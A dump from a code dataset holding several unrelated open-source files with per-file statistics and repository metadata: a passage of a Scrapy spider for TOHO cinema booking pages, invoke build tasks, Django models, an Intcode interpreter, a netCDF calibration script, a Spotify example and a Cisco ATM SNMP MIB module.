def generate_showing_url(self, site_cd, show_day, theater_cd, screen_cd,
movie_cd, showing_cd):
"""
generate showing url from given data
:param show_day: arrow object
"""
# example: javascript:ScheduleUtils.purchaseTicket(
# "20170212", "076", "013132", "0761", "11", "2")
# example: https://hlo.tohotheater.jp/net/ticket/076/TNPI2040J03.do
# ?site_cd=076&jyoei_date=20170209&gekijyo_cd=0761&screen_cd=10
# &sakuhin_cd=014183&pf_no=5&fnc=1&pageid=2000J01&enter_kbn=
day_str = show_day.format('YYYYMMDD')
return "https://hlo.tohotheater.jp/net/ticket/{site_cd}/"\
"TNPI2040J03.do?site_cd={site_cd}&jyoei_date={jyoei_date}"\
"&gekijyo_cd={gekijyo_cd}&screen_cd={screen_cd}"\
"&sakuhin_cd={sakuhin_cd}&pf_no={pf_no}&fnc={fnc}"\
"&pageid={pageid}&enter_kbn={enter_kbn}".format(
site_cd=site_cd, jyoei_date=day_str,
gekijyo_cd=theater_cd, screen_cd=screen_cd,
sakuhin_cd=movie_cd, pf_no=showing_cd,
fnc="1", pageid="2000J01", enter_kbn="")
def parse_normal_showing(self, response):
booked_seat_count = len(response.css('[alt~="購入済(選択不可)"]'))
result = init_show_booking_loader(
response=response, item=response.meta["data_proto"])
result.add_value('book_seat_count', booked_seat_count)
result.add_time_data()
yield result.load_item()
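# Hypothetical local run via Scrapy's programmatic API (editor's addition).
# Assumes the scrapyproject settings module is importable and that the
# ShowingSpider base class supplies self.date and self.crawl_booking_data.
from scrapy.crawler import CrawlerProcess
from scrapy.utils.project import get_project_settings

process = CrawlerProcess(get_project_settings())
process.crawl(TohoV2Spider)
process.start()  # blocks until the crawl finishes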
| 45.298755
| 79
| 0.646973
| 10,661
| 0.9753
| 1,951
| 0.178483
| 0
| 0
| 0
| 0
| 3,590
| 0.328424
|
8bd49f53da7caa09d61a988bf0e05ae48ef80b17
| 947
|
py
|
Python
|
tasks.py
|
ggrbill/fortran-examples
|
a790462fa3956a65505d4f529556f81cd5b0de95
|
[
"MIT"
] | null | null | null |
tasks.py
|
ggrbill/fortran-examples
|
a790462fa3956a65505d4f529556f81cd5b0de95
|
[
"MIT"
] | null | null | null |
tasks.py
|
ggrbill/fortran-examples
|
a790462fa3956a65505d4f529556f81cd5b0de95
|
[
"MIT"
] | null | null | null |
from invoke import task
@task()
def clean(ctx):
"""
Delete 'build' folder.
"""
print("Cleaning!")
ctx.run("rm -Rf build")
@task(
    help={
        'cclean': "Call the clean task (delete the 'build' folder) before building again."
    }
)
def build(ctx, cclean=False):
"""
Build Fortran95 code.
"""
if cclean:
clean(ctx)
print("Building!")
commands = [
'mkdir build',
'cd build',
'f95 -c ../src/vector_math.f95 ../src/hello.f95',
'f95 hello.o vector_math.o -o hello',
]
ctx.run(' && '.join(commands))
@task(
    help={
        'cclean': "Call the clean task (delete the 'build' folder) before building again."
    }
)
def build_fc(ctx, cclean=False):
"""
Build C code that calls a Fortran95 module.
"""
if cclean:
clean(ctx)
print("Building!")
commands = [
'mkdir build',
'cd build',
'gcc -c ../src/callfortran.c',
'f95 callfortran.o ../src/modulefort.f95',
]
ctx.run(' && '.join(commands))
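# Usage (editor's addition): from a shell these run as `invoke clean`,
# `invoke build --cclean` or `invoke build-fc`; a task can also be called
# programmatically with a Context (sketch, assuming invoke's Task is callable).
from invoke import Context
clean(Context())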
| 18.211538
| 74
| 0.583949
| 0
| 0
| 0
| 0
| 909
| 0.959873
| 0
| 0
| 519
| 0.548046
|
8bd4b1d2130b763d822163e0d5fcb7c191a3f224
| 203
|
py
|
Python
|
aristotle_json_editor/apps.py
|
aristotle-mdr/json-metadata-editor
|
2d97bea85c822d2e7b59fc8d96ca3eaa3b1ed916
|
[
"MIT"
] | null | null | null |
aristotle_json_editor/apps.py
|
aristotle-mdr/json-metadata-editor
|
2d97bea85c822d2e7b59fc8d96ca3eaa3b1ed916
|
[
"MIT"
] | 1
|
2017-07-25T09:44:11.000Z
|
2017-07-25T09:44:11.000Z
|
aristotle_json_editor/apps.py
|
aristotle-mdr/json-metadata-editor
|
2d97bea85c822d2e7b59fc8d96ca3eaa3b1ed916
|
[
"MIT"
] | null | null | null |
from aristotle_mdr.apps import AristotleExtensionBaseConfig
class AristotleJSONEditorConfig(AristotleExtensionBaseConfig):
name = 'aristotle_json_editor'
verbose_name = "Aristotle JSON Editor"
| 29
| 62
| 0.832512
| 140
| 0.689655
| 0
| 0
| 0
| 0
| 0
| 0
| 46
| 0.226601
|
8bd58dcecb3710fe85f09d22baab6422be4f4f1c
| 323
|
py
|
Python
|
fairlearn/reductions/_exponentiated_gradient/__init__.py
|
arita37/fairlearn
|
8f2cb25ca6a0c0aadcff90b927936de6d53ff5fa
|
[
"MIT"
] | 2
|
2019-11-30T09:02:42.000Z
|
2019-12-02T10:24:29.000Z
|
fairlearn/reductions/_exponentiated_gradient/__init__.py
|
arita37/fairlearn
|
8f2cb25ca6a0c0aadcff90b927936de6d53ff5fa
|
[
"MIT"
] | null | null | null |
fairlearn/reductions/_exponentiated_gradient/__init__.py
|
arita37/fairlearn
|
8f2cb25ca6a0c0aadcff90b927936de6d53ff5fa
|
[
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from .exponentiated_gradient import ExponentiatedGradient # noqa: F401
from .exponentiated_gradient import ExponentiatedGradientResult # noqa: F401
__all__ = [
"ExponentiatedGradient",
"ExponentiatedGradientResult"
]
| 29.363636
| 77
| 0.79257
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 168
| 0.520124
|
8bd6939b53a3043718695a488bbde929cd4e44d7
| 423
|
py
|
Python
|
akagi/contents/__init__.py
|
pauchan/akagi
|
7cf1f5a52b8f1ebfdc74a527bf6b26254f99343b
|
[
"MIT"
] | 26
|
2017-05-18T11:52:04.000Z
|
2018-08-25T22:03:07.000Z
|
akagi/contents/__init__.py
|
pauchan/akagi
|
7cf1f5a52b8f1ebfdc74a527bf6b26254f99343b
|
[
"MIT"
] | 325
|
2017-05-08T07:22:28.000Z
|
2022-03-31T15:43:18.000Z
|
akagi/contents/__init__.py
|
pauchan/akagi
|
7cf1f5a52b8f1ebfdc74a527bf6b26254f99343b
|
[
"MIT"
] | 7
|
2017-05-02T02:06:15.000Z
|
2020-04-09T05:32:11.000Z
|
# -*- coding: utf-8 -*-
from akagi.contents import s3_content
from akagi.contents import local_file_content
from akagi.contents import spreadsheet_content
from akagi.contents import url_content
from akagi.contents.s3_content import S3Content
from akagi.contents.local_file_content import LocalFileContent
from akagi.contents.spreadsheet_content import SpreadsheetContent
from akagi.contents.url_content import URLContent
| 35.25
| 65
| 0.858156
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 23
| 0.054374
|
8bd769344a472b553f48b5163b0040a5e6c76aa3
| 4,313
|
py
|
Python
|
src/advent/year2019/intcode.py
|
davidism/advent
|
761756f179c3547f44ec035880f29f58d80903f8
|
[
"BSD-3-Clause"
] | 5
|
2019-12-09T06:02:22.000Z
|
2021-12-03T18:02:49.000Z
|
src/advent/year2019/intcode.py
|
davidism/advent
|
761756f179c3547f44ec035880f29f58d80903f8
|
[
"BSD-3-Clause"
] | null | null | null |
src/advent/year2019/intcode.py
|
davidism/advent
|
761756f179c3547f44ec035880f29f58d80903f8
|
[
"BSD-3-Clause"
] | 2
|
2019-09-19T04:44:33.000Z
|
2021-05-09T14:39:58.000Z
|
from collections import defaultdict
from collections import deque
from typing import Deque
from typing import Dict
from typing import Iterable
from typing import List
from advent.load import read_input
def op(code: int, size: int, write=False):
    """Mark a method as the handler for opcode ``code`` taking ``size``
    parameters; ``write`` flags the last parameter as a write address."""
    def wrapper(f):
f.op = code
f.size = size
f.write = size - 1 if write else -1
return f
return wrapper
def find_ops(cls):
for key, value in vars(cls).items():
if key.startswith("op_"):
cls._op_to_name[value.op] = key
return cls
@find_ops
class Interpreter:
_op_to_name: Dict[int, str] = {}
def __init__(self, data: List[int], input=None, output=None):
self.data = defaultdict(int, enumerate(data))
self.pos = 0
self.ops = {k: getattr(self, v) for k, v in self._op_to_name.items()}
self.input = prepare_io(input)
self.output = prepare_io(output, output=True)
self.halted = False
self.rel = 0
def __getitem__(self, item: int) -> int:
return self.data[item]
def __setitem__(self, item: int, value: int):
self.data[item] = value
def run(self):
if self.halted:
return False
while True:
modes, op = divmod(self.data[self.pos], 100)
self.pos += 1
op = self.ops[op]
args = [self.data[self.pos + i] for i in range(op.size)]
self.pos += op.size
for i, arg in enumerate(args):
modes, mode = divmod(modes, 10)
if mode == 0:
if i != op.write:
args[i] = self.data[arg]
if mode == 2:
if i == op.write:
args[i] = self.rel + arg
else:
args[i] = self.data[self.rel + arg]
try:
op(*args)
except HaltExecution:
self.halted = True
break
except WaitInput:
self.pos -= 1 + op.size
break
return True
@op(99, 0)
def op_halt(self):
raise HaltExecution
@op(1, 3, True)
def op_add(self, a, b, dest):
self.data[dest] = a + b
@op(2, 3, True)
def op_mul(self, a, b, dest):
self.data[dest] = a * b
@op(3, 1, True)
def op_read(self, dest):
try:
value = self.input.popleft()
except IndexError:
raise WaitInput from None
self.data[dest] = value
@op(4, 1)
def op_write(self, value):
self.output.append(value)
@op(5, 2)
def op_jnz(self, test, goto):
if test:
self.pos = goto
@op(6, 2)
def op_jz(self, test, goto):
if not test:
self.pos = goto
@op(7, 3, True)
def op_lt(self, a, b, dest):
self.data[dest] = int(a < b)
@op(8, 3, True)
def op_eq(self, a, b, dest):
self.data[dest] = int(a == b)
@op(9, 1)
def op_rel(self, delta):
self.rel += delta
class InterpreterGroup:
def __init__(self):
self.group: List[Interpreter] = []
@property
def output(self) -> deque:
return self.group[-1].output
def attach(self, interpreter: Interpreter):
if not self.group:
self.group.append(interpreter)
else:
self.output.extendleft(reversed(interpreter.input))
interpreter.input = self.output
self.group.append(interpreter)
def feedback(self):
self.output.extend(self.group[0].input)
self.group[0].input = self.output
def run(self):
while True:
for interpreter in self.group:
interpreter.run()
if any(interpreter.halted for interpreter in self.group):
break
def prepare_io(value: Iterable[int] = None, output=False) -> Deque[int]:
if value is None:
return deque()
if not (
hasattr(value, "append" if output else "popleft") or isinstance(value, deque)
):
return deque(value)
return value
class HaltExecution(Exception):
pass
class WaitInput(Exception):
pass
def read_intcode(name=None) -> List[int]:
return [int(x) for x in read_input(name, 2).split(",")]
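# Smoke tests (editor's addition), using tiny programs from the Advent of
# Code 2019 Intcode spec; read_intcode/advent.load are not needed for these.
interp = Interpreter([1, 0, 0, 0, 99])  # adds data[0] + data[0] into data[0]
interp.run()
assert interp[0] == 2

interp = Interpreter([104, 42, 99])  # opcode 4 in immediate mode: output 42
interp.run()
assert list(interp.output) == [42]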
| 23.828729
| 85
| 0.537909
| 3,367
| 0.780663
| 0
| 0
| 2,596
| 0.601901
| 0
| 0
| 25
| 0.005796
|
8bd88ec45c6933abd1b51585d3a13a40674a382b
| 225
|
py
|
Python
|
exer/ex5-2.py
|
vitorsergiota/python
|
2cc95392a2a52a871e0582e4e900c0aa24a021a1
|
[
"MIT"
] | null | null | null |
exer/ex5-2.py
|
vitorsergiota/python
|
2cc95392a2a52a871e0582e4e900c0aa24a021a1
|
[
"MIT"
] | null | null | null |
exer/ex5-2.py
|
vitorsergiota/python
|
2cc95392a2a52a871e0582e4e900c0aa24a021a1
|
[
"MIT"
] | null | null | null |
num = int(input('Enter a number: '))
soma = 0
while num > 0:
    digito = num % 10  # get the units digit
    num = num // 10  # drop the units digit
    if digito % 2 == 0:  # even digit
        soma = soma + digito
print(soma)  # e.g. input 2467 -> 2 + 4 + 6 = 12
| 25
| 47
| 0.622222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 77
| 0.342222
|
8bd89aabbee1878012e7f1e4e9d5683197eea5ee
| 342
|
py
|
Python
|
korzh_bot/uleague/exceptions.py
|
uleague/universityleague-steam
|
65539664c0c6aad94a7ff3a3208323a554e1fddd
|
[
"MIT"
] | null | null | null |
korzh_bot/uleague/exceptions.py
|
uleague/universityleague-steam
|
65539664c0c6aad94a7ff3a3208323a554e1fddd
|
[
"MIT"
] | 2
|
2020-09-14T21:55:03.000Z
|
2020-11-17T17:23:34.000Z
|
korzh_bot/uleague/exceptions.py
|
uleague/universityleague-steam
|
65539664c0c6aad94a7ff3a3208323a554e1fddd
|
[
"MIT"
] | null | null | null |
class ULeagueRequestError(Exception):
"""
Basic exception for all requests
"""
def __init__(self, message):
self.message = message
super().__init__(self.message)
def __str__(self):
return "Произошла ошибка во время выполнения запроса на ULeague --> {}".format(
self.message
)
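# Hypothetical usage sketch (editor's addition):
try:
    raise ULeagueRequestError("timeout after 3 retries")
except ULeagueRequestError as exc:
    print(exc)  # An error occurred while executing a request to ULeague --> timeout after 3 retries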
| 24.428571
| 87
| 0.614035
| 382
| 0.997389
| 0
| 0
| 0
| 0
| 0
| 0
| 153
| 0.399478
|
8bd97144b2dc03785cd1d725114cfe7c4ea6a97a
| 644
|
py
|
Python
|
story/models.py
|
sachink2010/DjangoTrial
|
8b78a31409b614959ed45380f2b8ee9f03fa9f90
|
[
"MIT"
] | null | null | null |
story/models.py
|
sachink2010/DjangoTrial
|
8b78a31409b614959ed45380f2b8ee9f03fa9f90
|
[
"MIT"
] | null | null | null |
story/models.py
|
sachink2010/DjangoTrial
|
8b78a31409b614959ed45380f2b8ee9f03fa9f90
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
class Story(models.Model):
user_input = models.CharField(max_length=600)
api_response = models.CharField(max_length=2000, null=True, blank=True)
#timestamp=models.DateTimeField
created_at = models.DateTimeField(auto_now_add=True)
username = models.CharField(max_length=200)
class Code(models.Model):
user_input = models.CharField(max_length=600)
api_response = models.CharField(max_length=2000, null=True, blank=True)
#timestamp=models.DateTimeField
created_at = models.DateTimeField(auto_now_add=True)
username = models.CharField(max_length=200)
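# Usage sketch (editor's addition): run inside `python manage.py shell` after
# migrations have been applied; the field values are illustrative.
story = Story.objects.create(user_input="Once upon a time...", username="alice")
print(story.created_at)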
| 40.25
| 75
| 0.768634
| 585
| 0.908385
| 0
| 0
| 0
| 0
| 0
| 0
| 88
| 0.136646
|
8bdc456df221aa9aaf1072900c707aafc646d202
| 3,123
|
py
|
Python
|
scripts/find_best_fit.py
|
NERC-CEH/nanofase-calibration
|
e45da5f0566e345504214018eb4b9c013bab4c57
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/find_best_fit.py
|
NERC-CEH/nanofase-calibration
|
e45da5f0566e345504214018eb4b9c013bab4c57
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/find_best_fit.py
|
NERC-CEH/nanofase-calibration
|
e45da5f0566e345504214018eb4b9c013bab4c57
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
import os
import sys
import argparse
import re
import shutil
import numpy as np
from netCDF4 import Dataset
"""This script is useful for finding the best find from the `optimize.log` file,
the getting the parameters for this fit from logged results"""
# Parse the input arguments
parser = argparse.ArgumentParser(description='Find the best-fit parameters found so far')
parser.add_argument('--caldir', '-c', help='path to the calibration directory', default='./')
parser.add_argument('--yearrange', '-yr', nargs=2, type=int, help='year range to run calibration for (inclusive)')
parser.set_defaults(yearrange=[2009,2012])
args = parser.parse_args()
cal_dir = args.caldir
year_range = range(args.yearrange[0], args.yearrange[1]+1)
# Open the optimize.log file and find the best fit by plucking the cost and run ID
# from each line that begins with 'C' (Cost for...)
with open(os.path.join(cal_dir, 'optimize.log')) as f:
costs = []
ids = []
for line in f:
if line[0] == 'C':
            split = re.split(r'Cost for |: ', line)  # raw string: '\:' is an invalid escape
ids.append(split[1])
costs.append(float(split[2]))
# Print the minimum cost and the corresponding run ID
costs = np.array(costs)
run_id = ids[costs.argmin()]
print(f'Minimum cost: {costs.min()}')
print(f'For run ID: {run_id}')
# Now get the parameters that produced that cost
params_f = np.load(os.path.join(cal_dir, 'results', f'{run_id}.npz'))
params = params_f['params']
# Finally, we can recreate the NetCDF files used for this run
param_names = ['resuspension_alpha', 'resuspension_beta', 'sediment_transport_a', 'sediment_transport_c',
'deposition_alpha', 'deposition_beta', 'bank_erosion_alpha', 'bank_erosion_beta']
# Get the template for the 2D array
nc_subcatchment = Dataset(os.path.join(cal_dir, 'data', f'{args.yearrange[0]}_no-emissions.nc'), 'r')
var = nc_subcatchment['flow_dir'][:,:]
catchment_mask = var.mask
catchment_shape = var.shape
n_cells = var.count()
# Make a copy of the template NetCDFs to add this iteration's params to
for year in year_range:
dst_path = os.path.join(cal_dir, f'data_cache/{year}_no-emissions_{run_id}.nc')
shutil.copy(os.path.join(cal_dir, f'data/{year}_no-emissions.nc'), dst_path)
# Pull out the 1D arrays for each parameter from the params variable, then
# reshape to the correct grid shape and mask and add to NetCDF file
for i, param in enumerate(param_names):
    param_1d = params[n_cells*i:n_cells*i+n_cells]
    param_2d = np.ma.masked_array(np.empty(catchment_shape), mask=catchment_mask)
    # Reshape into 2D arrays, taking into account the mask
    j = 0
    for idx, _ in np.ndenumerate(param_2d):  # idx avoids shadowing the outer i
        if ~catchment_mask[idx]:
            param_2d[idx] = param_1d[j]
            j = j + 1
# Now add this variable to the NetCDF file, placing a copy in the cache
for year in year_range:
# Then create the new variables
nc = Dataset(os.path.join(cal_dir, f'data_cache/{year}_no-emissions_{run_id}.nc'), 'r+')
var = nc.createVariable(param, datatype=float, dimensions=('y','x'))
var[:] = param_2d
nc.close()
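# The reshape-with-mask trick above, in isolation on a toy 2x2 grid
# (editor's addition; values are illustrative).
toy_mask = np.array([[False, True],
                     [False, False]])
flat = np.array([1.0, 2.0, 3.0])  # one value per unmasked cell
grid = np.ma.masked_array(np.empty(toy_mask.shape), mask=toy_mask)
j = 0
for idx, _ in np.ndenumerate(grid):
    if ~toy_mask[idx]:
        grid[idx] = flat[j]
        j += 1
print(grid)  # [[1.0 --] [2.0 3.0]]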
| 42.780822
| 114
| 0.700288
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,503
| 0.481268
|
8bde4876eb8d22e2a2bf6ea4f21056c49d4893b8
| 347
|
py
|
Python
|
examples/simple1.py
|
jimcortez/spotipy_twisted
|
49ff2a4a5a5a9b3184b22adbe068eb91a38f3102
|
[
"MIT"
] | null | null | null |
examples/simple1.py
|
jimcortez/spotipy_twisted
|
49ff2a4a5a5a9b3184b22adbe068eb91a38f3102
|
[
"MIT"
] | null | null | null |
examples/simple1.py
|
jimcortez/spotipy_twisted
|
49ff2a4a5a5a9b3184b22adbe068eb91a38f3102
|
[
"MIT"
] | null | null | null |
import spotipy_twisted
birdy_uri = 'spotify:artist:2WX2uTcsvV5OnS0inACecP'
spotify = spotipy_twisted.Spotify()
results = spotify.artist_albums(birdy_uri, album_type='album')
albums = results['items']
while results['next']:
results = spotify.next(results)
albums.extend(results['items'])
for album in albums:
print(album['name'])
| 20.411765
| 62
| 0.743516
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 72
| 0.207493
|
8bde558284ee50c285e21e6e1f4a0e2c6265f5bf
| 21,737
|
py
|
Python
|
pysnmp-with-texts/CISCO-ATM-EXT-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 8
|
2019-05-09T17:04:00.000Z
|
2021-06-09T06:50:51.000Z
|
pysnmp-with-texts/CISCO-ATM-EXT-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 4
|
2019-05-31T16:42:59.000Z
|
2020-01-31T21:57:17.000Z
|
pysnmp-with-texts/CISCO-ATM-EXT-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module CISCO-ATM-EXT-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-ATM-EXT-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:50:35 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint, ConstraintsUnion, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsUnion", "ConstraintsIntersection")
atmVclEntry, aal5VccEntry = mibBuilder.importSymbols("ATM-MIB", "atmVclEntry", "aal5VccEntry")
ciscoMgmt, = mibBuilder.importSymbols("CISCO-SMI", "ciscoMgmt")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
Unsigned32, iso, TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, Counter32, NotificationType, IpAddress, Bits, ModuleIdentity, Gauge32, MibIdentifier, Counter64, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "Unsigned32", "iso", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "Counter32", "NotificationType", "IpAddress", "Bits", "ModuleIdentity", "Gauge32", "MibIdentifier", "Counter64", "ObjectIdentity")
DisplayString, TextualConvention, TruthValue = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention", "TruthValue")
ciscoAtmExtMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 9, 88))
ciscoAtmExtMIB.setRevisions(('2003-01-06 00:00', '1997-06-20 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: ciscoAtmExtMIB.setRevisionsDescriptions(('Added ciscoAtmVclExtOamTable for OAM configuration and state information.', 'Initial version of this MIB module.',))
if mibBuilder.loadTexts: ciscoAtmExtMIB.setLastUpdated('200301060000Z')
if mibBuilder.loadTexts: ciscoAtmExtMIB.setOrganization('Cisco Systems, Inc.')
if mibBuilder.loadTexts: ciscoAtmExtMIB.setContactInfo(' Cisco Systems Customer Service Postal: 170 W. Tasman Drive San Jose, CA 95134 USA Tel: +1 800 553-NETS E-mail: cs-atm@cisco.com')
if mibBuilder.loadTexts: ciscoAtmExtMIB.setDescription('An extension to the Cisco ATM MIB module for managing ATM implementations. Acronyms and terms used in the MIB module: AAL5 -- ATM adaptation layer 5. AIS -- Alarm Indication Signal. CC -- Continuity Check. End-to-end -- End-to-end continuity checking. Monitoring occurs on the entire VC between two ATM end stations. F5 OAM -- OAM information flow between network elements (NEs) used within virtual connections to report degraded virtual channel performance. OAM -- Operations, Administration and Maintenance. RDI -- Remote Detection Indication. Segment -- Segment continuity checking. Monitoring occurs on a VC segment between a router and a first-hop ATM switch. VC -- Virtual Channel. VCC -- Virtual Channel Connection. VCL -- Virtual Channel Link.')
ciscoAtmExtMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 88, 1))
cAal5VccExtMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 1))
catmxVcl = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2))
class OamCCStatus(TextualConvention, Integer32):
description = 'OAM Continuity check (CC) status. ready(1) -- CC is not activated on VC. waitActiveResponse(2) -- Waiting for active-response. waitActiveConfirm(3) -- Waiting for active-confirm. active(4) -- CC is activated on VC. waitDeactiveConfirm(5) -- Waiting for deactivate confirm.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))
namedValues = NamedValues(("ready", 1), ("waitActiveResponse", 2), ("waitActiveConfirm", 3), ("active", 4), ("waitDeactiveConfirm", 5))
class OamCCVcState(TextualConvention, Integer32):
description = 'OAM Continuity check (CC) VC state. verified(1) -- CC is successful. VC is up. aisrdi(2) -- CC failed. VC is down. notManaged(3) -- VC is not managed by CC.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3))
namedValues = NamedValues(("verified", 1), ("aisrdi", 2), ("notManaged", 3))
cAal5VccExtTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 1, 1), )
if mibBuilder.loadTexts: cAal5VccExtTable.setStatus('current')
if mibBuilder.loadTexts: cAal5VccExtTable.setDescription('This table contains AAL5 VCC performance parameters beyond that provided by cAal5VccEntry.')
cAal5VccExtEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 1, 1, 1), )
aal5VccEntry.registerAugmentions(("CISCO-ATM-EXT-MIB", "cAal5VccExtEntry"))
cAal5VccExtEntry.setIndexNames(*aal5VccEntry.getIndexNames())
if mibBuilder.loadTexts: cAal5VccExtEntry.setStatus('current')
if mibBuilder.loadTexts: cAal5VccExtEntry.setDescription('This list contains the additional AAL5 VCC performance parameters beyond that provided by cAal5VccEntry.')
cAal5VccExtCompEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 1, 1, 1, 1), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cAal5VccExtCompEnabled.setStatus('current')
if mibBuilder.loadTexts: cAal5VccExtCompEnabled.setDescription('Boolean, if compression enabled for VCC.')
cAal5VccExtVoice = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 1, 1, 1, 2), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cAal5VccExtVoice.setStatus('current')
if mibBuilder.loadTexts: cAal5VccExtVoice.setDescription('Boolean, TRUE if VCC is used to carry voice.')
cAal5VccExtInF5OamCells = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 1, 1, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cAal5VccExtInF5OamCells.setStatus('current')
if mibBuilder.loadTexts: cAal5VccExtInF5OamCells.setDescription('Number of OAM F5 end to end loopback cells received through the VCC.')
cAal5VccExtOutF5OamCells = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 1, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cAal5VccExtOutF5OamCells.setStatus('current')
if mibBuilder.loadTexts: cAal5VccExtOutF5OamCells.setDescription('Number of OAM F5 end to end loopback cells sent through the VCC.')
catmxVclOamTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1), )
if mibBuilder.loadTexts: catmxVclOamTable.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamTable.setDescription('This table contains Virtual Channel Link (VCL) Oam configuration and state information. This table augments the atmVclTable.')
catmxVclOamEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1), )
atmVclEntry.registerAugmentions(("CISCO-ATM-EXT-MIB", "catmxVclOamEntry"))
catmxVclOamEntry.setIndexNames(*atmVclEntry.getIndexNames())
if mibBuilder.loadTexts: catmxVclOamEntry.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamEntry.setDescription('This list contains Virtual Channel Link (VCL) configuration and state information beyond that provided by atmVclEntry.')
catmxVclOamLoopbackFreq = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 1), Unsigned32()).setUnits('seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamLoopbackFreq.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamLoopbackFreq.setDescription('Specifies OAM loopback frequency.')
catmxVclOamRetryFreq = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 2), Unsigned32()).setUnits('seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamRetryFreq.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamRetryFreq.setDescription('Specifies OAM retry polling frequency.')
catmxVclOamUpRetryCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 3), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamUpRetryCount.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamUpRetryCount.setDescription('Specifies OAM retry count before declaring a VC is up.')
catmxVclOamDownRetryCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 4), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamDownRetryCount.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamDownRetryCount.setDescription('Specifies OAM retry count before declaring a VC is down.')
catmxVclOamEndCCActCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 5), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamEndCCActCount.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamEndCCActCount.setDescription('Specifies OAM End-to-end Continuity check (CC) Activation retry count.')
catmxVclOamEndCCDeActCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 6), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamEndCCDeActCount.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamEndCCDeActCount.setDescription('Specifies OAM End-to-end Continuity check (CC) Deactivation retry count.')
